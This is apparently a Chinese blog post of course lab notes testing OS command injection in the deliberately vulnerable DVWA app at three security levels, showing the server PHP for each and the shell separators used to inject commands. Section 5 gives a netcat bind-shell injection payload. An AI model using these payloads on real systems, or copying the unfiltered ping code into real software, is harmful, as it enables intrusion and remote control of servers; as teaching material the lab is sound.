2. 程式人生 > >Kali Linux滲透測試 086 手動漏洞挖掘-命令執行漏洞

Kali Linux滲透測試 086 手動漏洞挖掘-命令執行漏洞

阿新 發佈:2019-02-14

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程

1. 命令執行漏洞
2. 測試 Low 安全模式
    2-1. 測試手段
    2-2. 伺服器原始碼
3. 測試 Medium 安全模式
    3-1. 測試手段
    3-2. 伺服器原始碼
4. 測試 high 安全模式
    4-1. 測試手段
    4-2. 伺服器原始碼
5. 使伺服器開啟埠
    5-1. Low 安全模式

1. 命令執行漏洞

  1. 採用 DVWA 系統,IP地址:10.10.10.132
  2. Kali Linux 2018.1,IP地址:10.10.10.131

  3. 簡介

    應用程式直接呼叫作業系統命令的功能

2. 測試 Low 安全模式

1. 測試手段

  1. 輸入IP地址發現,是執行 ping 測試,發現和 ping 3 次結果一樣

  2. 使用符號 “;”、“&”、“&&”、“|”、“||”

    • 使用“;”

    • 使用“&”

    • 使用“&&”

    • 使用“|”

    • 使用“||”

2. 伺服器原始碼

# 低安全級別的情況下,伺服器未進行任何過濾
 <?php
if( isset( $_POST[ 'submit' ] ) ) {
    $target = $_REQUEST[ 'ip' ];
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
    } else { 
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
    }
}
?>

3. 測試 Medium 安全模式

1. 測試手段

  1. 輸入IP地址發現,是執行 ping 測試,發現和 ping 3 次結果一樣

  2. 使用符號 “;”、“&”、“&&”、“|”、“||”

    • 使用“;”

      無結果

    • 使用“&”

    • 使用“&&”

      無結果

    • 使用“|”

    • 使用“||”

2. 伺服器原始碼

# 進行了簡單的過濾,替換:'&&' => '',';' => '',使其無效。
 <?php
if( isset( $_POST[ 'submit'] ) ) {
    $target = $_REQUEST[ 'ip' ];
    // Remove any of the charactars in the array (blacklist).

    $substitutions = array(
        '&&' => '',
        ';' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
    } else { 
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
    }
}
?>

4. 測試 high 安全模式

1. 測試手段

  1. 輸入IP地址發現,是執行 ping 測試,發現和 ping 3 次結果一樣

  2. 使用符號 “;”、“&”、“&&”、“|”、“||”.

    • 使用“;”

    • 使用“&”

      同上

    • 使用“&&”

      同上

    • 使用“|”

      同上

    • 使用“||”

      同上

2. 伺服器原始碼

#進行嚴格的過濾,不再存在命令執行漏洞
Command Execution Source
<?php
if( isset( $_POST[ 'submit' ] ) ) {
    $target = $_REQUEST["ip"];
    $target = stripslashes( $target );
    // Split the IP into 4 octects
    $octet = explode(".", $target);

    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) {

    // If all 4 octets are int's put the IP back together.
    $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) { 
            $cmd = shell_exec( 'ping  ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        } else { 
            $cmd = shell_exec( 'ping  -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        }
    }
    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }
}
?>

5. 使伺服器開啟埠

1. Low 安全模式

  1. 開啟監聽埠

    ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe

  2. 使用 kali 連線

  3. 弊端

    使用 nc 會被管理員發現打開了額外的埠

相關推薦

Kali Linux滲透測試 086 手動漏洞挖掘-命令執行漏洞

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 命令執行漏洞 2. 測試 Low 安全

Kali Linux滲透測試 101 手動漏洞挖掘-CSRF 漏洞

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 2. 判斷漏洞 3. 伺服器原始

Kali Linux 滲透測試:掃描漏洞

                                     Kali Lin

【安全牛學習筆記】Kali Linux滲透測試方法

信息安全 kali linux security+ 1.安全問題的根源①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作③由於人都是會犯錯誤的,因此

kali linux滲透測試——信息收集

新網數碼 例子 .cn 收集 主機 工具 dns服務 發送 分析 一.公開網站 我們可以通過公開網站收集目標域的有關信息,這樣我們不必向目標網絡直接發送數據,從而避免使目標察覺我們的行動。 自行百度,不再贅述。 二.域名的註冊信息 whois數據庫記錄有該域名的DNS

Kali linux滲透測試系列————28、Kali linux 滲透攻擊之社會工程學攻擊

社會工程學社會工程學是利用人性的弱點體察、獲取有價值資訊的實踐方法,它是一種期盼的藝術。在缺少目標系統的必要資訊時,社會工程學技術是滲透測試人員獲取資訊的至關重要的手段。對於素有型別的組織而言,人都是安全防範措施李最為薄弱的一個環節,也是整個安全基礎設施最脆弱的層面。從安全的

Kali Linux 滲透測試手冊(1.1)安裝虛擬機器

翻譯來自:掣雷小組 成員資訊: thr0cyte, Gr33k, 花花, 小丑, R1ght0us, 7089bAt, 一.配置KALI Linux和滲透測試環境 在這一章,我們將覆蓋以下內容: 在Windows和Linux上安裝VirtualBox 建立一個Kali L

【安全牛學習筆記】​Kali Linux滲透測試介紹

Kali Linux滲透測試介紹 安全問題的根源         優點:分工明確,工作效率高。(把大問題簡化成易於解決的小問題)         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。(搞技術的為了提高工作效率,只追求功能實現, 很少能在實現功能後

Kali linux滲透測試系列————23、Kali linux 滲透攻擊之伺服器端攻擊

漏洞評估伺服器端攻擊即找出並利用伺服器上的服務、埠和應用程式中的漏洞。舉個例子,Web伺服器都有多個攻擊途徑(Attack Vector)。它會執行一個作業系統,並執行各種各樣的軟體來提供Web功能。它會有很多開啟的TCP埠。這些途徑中的每一個都有可能找出一個攻擊者能利用的漏

Kali Linux滲透測試 021 主動資訊收集

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 直接與目標系統互動通訊 無法避免留下訪問的痕跡 使用受控的第三方電腦進行探測

Kali linux滲透測試系列————12、Kali linux資訊收集之作業系統識別

識別作業系統在確定目標主機線上之後,應當識別他們使用的作業系統。這階段工作通常稱為識別作業系統(也稱為作業系統指紋識別)。識別作業系統的方式有三種:主動式和被動式。主動式識別工具向目標主機發送資料包,並根據目標的響應來確定其使用的作業系統。這種方式的優點在於探測速度快,缺點是

Kali Linux滲透測試 045 讀取windows本地密碼

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 抓包嗅探 2. 鍵盤記錄本地密碼 3. 檢視本地快取密碼 4. WCE (WINDOWS

Kali linux滲透測試(一)

最近在學習kali,所以開個系列來記錄下吧 0x01 寫在前面 要養成從根源解決問題的習慣 安全問題的根源 分層思想的優劣(化整為零,把大化小,逐一實現) 只追求功能的實現(久而久之,眼光侷限,沒辦法看全域性,看整體——安全) 最大的安全威脅是人(人

【安全牛學習筆記】Kali Linux滲透測試介紹

​Kali Linux滲透測試介紹      安全問題的根源         優點:分工明確,工作效率高。         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。         最大威脅是人,人都會犯錯,安全問題不能100%絕對根除。    

Kali Linux滲透測試 049 清除痕跡

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 清除滲透攻擊痕跡 1.清除滲透攻擊痕跡 最多也只是清除本地記錄,如果有日誌伺服器的話還是會被

Kali linux滲透測試系列————34、Kali linux 維持訪問之建立Web後門

WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隱蔽的指令碼類Web後門工具。藉助HTTP協議,它可以在客戶端和伺服器端實現執行程式碼的網頁終端。WeBaCoo有兩種工作模式:Generation(生產線模式):指定-g選項可進入這種模式。使用者可

Kali linux滲透測試系列————13、Kali linux資訊收集之埠掃描

埠掃描簡單來說埠掃描就是一種用來確定目標主機的TCP埠和UDP埠狀態的方法。主機開發了某個埠,就意味著他在中國埠提供某種網路服務。如果某個埠處於關閉狀態,這說明主機在這個埠上並沒有提供網路服務。在確定某埠開發狀態之後,攻擊人員就會檢查在該埠提供相應的服務的程式版本,以判斷這個

kali linux 滲透測試 第五章 netcat--nc

繼續記筆記~~~ 有了netcat,可以不用telnet了 nc的作用: 偵聽模式 / 傳輸模式 telnet / 獲取banner資訊 傳輸文字資訊 傳輸檔案/目錄 加密傳輸文檔案 遠端控制/木木⻢馬 加密所有流量 流媒體伺服器 遠端克隆

我的Kali Linux滲透測試學習之路

少壯不努力,老大徒傷悲。這句話時刻提醒著我,我是一名本科學生,自從今年我的同學把這一網站推薦了給我。通過我的同學說他不斷的聽課請教老師,能把多種知識融匯貫通,讓他感覺自己就像一個什麼都不懂的2B程式設計師成為一個網路大佬。現在我已經快畢業了,在安全牛課堂我打算學網路方面的知

Kali Linux 滲透測試 部落格記錄

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 ————————基本環境———————— Kali Linux滲透測試 001 安裝環境 Ka